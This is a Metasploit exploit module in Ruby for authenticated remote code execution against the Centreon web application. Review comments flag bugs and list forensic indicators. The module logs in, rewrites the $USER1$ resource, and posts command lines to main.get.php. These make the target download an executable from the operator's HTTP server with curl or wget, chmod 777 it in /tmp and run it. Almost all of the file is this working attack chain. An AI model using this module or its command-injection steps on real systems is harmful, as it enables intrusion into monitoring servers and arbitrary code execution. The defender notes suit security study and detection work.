##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module aimed at the Centreon web application.
#
# The module is authenticated: every path below first logs in with the
# USERNAME/PASSWORD options. After login it rewrites a Centreon resource
# entry, hosts a generated executable on the framework's own HTTP server and
# submits command lines to main.get.php that fetch, chmod and run that file.
#
# NOTE(review): the "Description" is a stub ("rce") and the module records no
# advisory reference or affected version range, so it cannot be mapped to a
# specific fix from this file alone.
#
# Artifacts visible in this code that a defender can look for on a Centreon
# host: requests to main.get.php with p=60904 (resource edit) and p=60801
# carrying a command_line parameter, a changed $USER1$ resource, and a file
# created under /tmp with mode 777.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Registers module metadata and the operator-facing options.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
                      "Name" => "Centreon RCE",
                      "Description" => %q{
          rce
        },
                      "License" => MSF_LICENSE,
                      "Platform" => "linux",
                      "Targets" => [
                        ["Centreon", {}],
                      ],
                      "Stance" => Msf::Exploit::Stance::Aggressive,
                      "Privileged" => false,
                      "DisclosureDate" => "Sep 17 2019",
                      "DefaultOptions" => {
                        "SRVPORT" => 80,
                      },
                      "DefaultTarget" => 0))
    register_options(
      [
        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
        # Selects the download tool used in send_payload: "curl", otherwise wget.
        OptString.new("METHOD", [true, "Method", "curl"]),
        # NOTE(review): the USERNAME and PASSWORD help texts are copy-pasted
        # from TARGETURI and do not describe these options.
        OptString.new("USERNAME", [true, "The URI of the Centreon Application", "admin"]),
        OptString.new("PASSWORD", [true, "The URI of the Centreon Application", ""]),
        # Upper bound, in seconds, for the Timeout block in #exploit.
        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
      ]
    )
  end

  # Logs in to Centreon and reports whether the login succeeded.
  #
  # NOTE(review): CheckCode::Appears here only means the credentials were
  # accepted (the post-login page marker was found); nothing in this method
  # probes for the vulnerable behaviour, so the result should not be read as
  # confirmation that the target is exploitable.
  # NOTE(review): when no token is found the method falls through and returns
  # nil instead of a CheckCode, and `res` is used without a nil check.
  #
  # @return [Exploit::CheckCode, nil]
  def check
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "index.php"),
      "method" => "GET",
    )
    # Session cookies from the login page are reused for every later request.
    @phpsessid = res.get_cookies
    # A regex literal on the left of =~ with a named group defines the local
    # variable `token` (nil when there is no match).
    /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
    if token
      print_status("Successfully got token #{token}")
      res = send_request_cgi!(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "useralias" => datastore["USERNAME"],
          "password" => datastore["PASSWORD"],
          "centreon_token" => token,
        },
      )
      # This string is used as the marker for "logged in".
      if res.body.include? "You need to enable JavaScript to run this app"
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Unknown
      end
    end
  end

  # Entry point: logs in, rewrites the $USER1$ resource, then hands control to
  # the parent implementation (via `super`) for at most HTTPDELAY seconds.
  #
  # NOTE(review): the login sequence duplicates #check line for line.
  # NOTE(review): the previous resource_line value is saved in @old_path but
  # nothing in this file reads it back, so the target is left with the
  # "Nagios Plugins Path" resource pointing at "/" after a run. Whoever ran an
  # authorized test has to restore that value by hand; for defenders, an
  # unexpected change to this resource is an indicator of tampering.
  def exploit
    begin
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "GET",
      )
      @phpsessid = res.get_cookies
      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
      if token
        print_status("Successfully got token #{token}")
        res = send_request_cgi!(
          "uri" => normalize_uri(target_uri.path, "index.php"),
          "method" => "POST",
          "cookie" => @phpsessid,
          "vars_post" => {
            "useralias" => datastore["USERNAME"],
            "password" => datastore["PASSWORD"],
            "centreon_token" => token,
          },
        )
        if res.body.include? "You need to enable JavaScript to run this app"
          # Load the edit form for resource_id 1 to obtain a fresh token and
          # the resource's current value.
          res = send_request_cgi(
            "uri" => normalize_uri(target_uri.path, "main.get.php"),
            "method" => "GET",
            "cookie" => @phpsessid,
            "vars_get" => {
              "p" => "60904",
              "o" => "c",
              "resource_id" => 1,
            },
          )
          /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
          /resource_line\".*value=\"(?<old_path>.*?)\"/ =~ res.body
          @old_path = old_path
          # Submit the form with resource_line set to "/". The adjacent string
          # literals in "initialValues" concatenate to "a:0:{}".
          res = send_request_cgi(
            "uri" => normalize_uri(target_uri.path, "main.get.php", "?p=60904"),
            "method" => "POST",
            "cookie" => @phpsessid,
            "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },
          )
          begin
            # `super` presumably resolves to the HttpServer mixin's exploit,
            # which starts the listener and invokes #primer; confirm against
            # the framework source.
            Timeout.timeout(datastore["HTTPDELAY"]) { super }
          rescue Timeout::Error
            # NOTE(review): the same event is reported as both success and
            # error, which makes the operator log ambiguous.
            print_good("timeout")
            vprint_error("timeout")
          end
        else
          vprint_error("Cannot login")
        end
      else
        vprint_error("Couldn't get token")
      end
    rescue ::Rex::ConnectionError
      vprint_error("Connection error")
    end
  end

  # Builds the executable and the URL it is served from, then asks the target
  # to download it. Presumably called by the HTTP server mixin once the
  # listener is up; the caller is not visible in this file.
  def primer
    @pl = generate_payload_exe
    # First registered resource path of the local HTTP service; also reused as
    # the file name under /tmp on the target.
    @path = service.resources.keys[0]
    binding_ip = srvhost_addr
    proto = datastore["SSL"] ? "https" : "http"
    payload_uri = "#{proto}://#{binding_ip}/#{@path}"
    send_payload(payload_uri)
  end

  # Submits a command line that downloads payload_uri to /tmp/<@path> using
  # curl or wget.
  #
  # NOTE(review): the request is a POST but its parameters are passed as
  # vars_get, so the full command line travels in the query string and will
  # normally appear in the web server's access log.
  #
  # @param payload_uri [String] URL of the file hosted by this module
  def send_payload(payload_uri)
    if datastore["method"] == "curl"
      payload = "/bin/bash -c \"curl #{payload_uri} -o /tmp/#{@path}\""
    else
      payload = "/bin/bash -c \"wget #{payload_uri} -O /tmp/#{@path}\""
    end
    # The response is assigned but never inspected.
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
    )
  end

  # HTTP server callback: serves the generated executable to the requester,
  # then triggers #run_shell and stops the local service.
  #
  # @param cli the client connection supplied by the framework
  # @param req the incoming request (only req.uri is read here)
  def on_request_uri(cli, req)
    print_good("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
    run_shell
    stop_service
  end

  # Sends two more command_line requests: one sets mode 777 on /tmp/<@path>,
  # the other runs it.
  #
  # NOTE(review): neither response is checked, and nothing visible in this
  # file removes /tmp/<@path> afterwards, so a world-writable executable stays
  # on the target after a run and is a useful forensic artifact.
  def run_shell
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
        "o": "p",
        "min": 1,
      },
    )
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/tmp/#{@path}",
        "o": "p",
        "min": 1,
      },
    )
  end
end